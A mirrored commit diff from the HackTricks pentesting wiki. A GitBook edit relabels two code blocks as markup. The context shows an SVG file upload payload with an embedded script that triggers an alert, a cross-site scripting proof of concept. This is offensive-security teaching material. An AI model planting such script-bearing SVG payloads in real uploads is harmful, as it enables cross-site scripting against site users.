mirror of
https://github.com/carlospolop/hacktricks
synced 2025-02-16 14:08:26 +00:00
GitBook: [master] one page modified
This commit is contained in:
parent
88834dcf66
commit
22eba62218
1 changed files with 2 additions and 2 deletions
|
@ -935,13 +935,13 @@ Content-Type: image/svg+xml
|
|||
-----------------------------232181429808--
|
||||
```
|
||||
|
||||
```javascript
|
||||
```markup
|
||||
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
|
||||
<script type="text/javascript">alert("XSS")</script>
|
||||
</svg>
|
||||
```
|
||||
|
||||
```python
|
||||
```markup
|
||||
<?xml version="1.0" standalone="no"?>
|
||||
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
|
||||
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
|
||||
|
|
Loading…
Add table
Reference in a new issue